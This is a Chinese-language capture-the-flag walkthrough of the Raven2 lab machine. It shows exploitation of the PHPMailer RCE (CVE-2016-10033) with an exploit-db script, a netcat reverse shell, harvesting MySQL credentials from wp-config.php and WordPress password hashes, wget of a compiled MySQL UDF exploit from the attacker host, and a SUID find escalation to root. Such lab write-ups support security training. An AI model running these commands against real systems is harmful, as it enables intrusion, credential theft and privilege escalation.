在Raven1渗透实战中利用ssh的登录michael账号，查看wordpress的mysql数据库中的root账号、密码进行登录，再利用mysql udf提权。

或者通过wordpress.users表中的steven账号、密码进行ssh登录后，执行python提权。

但在Raven2渗透实战中发现wordpress泄露出来的账号 michael无法通过ssh登录，上述的方法自然就不可行了。

但在渗透过程中发现phpmalier远程代码执行漏洞（CVE-2016-10033）

phpmailer远程代码执行

在 http://192.168.8.126/vendor/PATH 发现第一个flag和网站根路径：/var/www/html/

flag1
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

在 http://192.168.8.126/vendor/VERSION 发现版本号 5.2.16

在kali中

searchsploit phpmailer

searchsploit

5.2.16版本正好在射程范围之内，选择40974.py，复制到根目录

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/

更改配置信息，目标target，生成的后门文件名一定要改，shell反弹，后门路径
(注：targer地址应是站点的contact.php)

40974.py
运行该py程序，在靶机生成后门

python3 40974.py

(可能报错，pip安装所需要的模块即可)

python3 40974.py

在kali上开启nc监听，等待反弹，

nc -lvp 6666

触发后门：http://192.168.8.126/mm.php

反弹shell
用python切换到交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

python shell
接下来直接先全局搜flag：
find flag
找到flag3，是图片，直接访问
http://192.168.8.126/wordpress/wp-content/uploads/2018/11/flag3.png
flag3
之后只要重复Raven1中的操作，查看wordpress中config配置，登录数据库

cat wp-config.php

wp-config
登录数据库 root / R@v3nSecurity

mysql –uroot –p

提权

进入wordpress数据库，查看users表

select * from wp_users

wp-users

michael    |  $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0   （解不出来）
steven     |  $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad.

steven
steven / LOLLOL1
直接尝试ssh登录，竟然失败了，果然没Raven1这么简单

mysql udf提权

phpmailer反弹回来的shell是无法上传文件的，
只能通过wget从kali中下载exp (kali开启了apach服务)
先将exp 1518.c 在本地kali上编译完成后，靶机在wget

gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc

靶机wget，编译后生成1518.so和1518.o，只需要1518.so即可

wget http://192.168.8.253/1518.so

wget

接下来提权过程就照着参考敲命令

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.12 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.12 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.03 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.11 sec)

mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> quit
Bye

touch foo

find foo -exec 'whoami' \;

find foo -exec '/bin/sh' \;

Raven2

完成了Raven2渗透

Raven2靶机百度云
链接：https://pan.baidu.com/s/17vBNAeodW_tnBCMHFXK8QA
提取码：yusb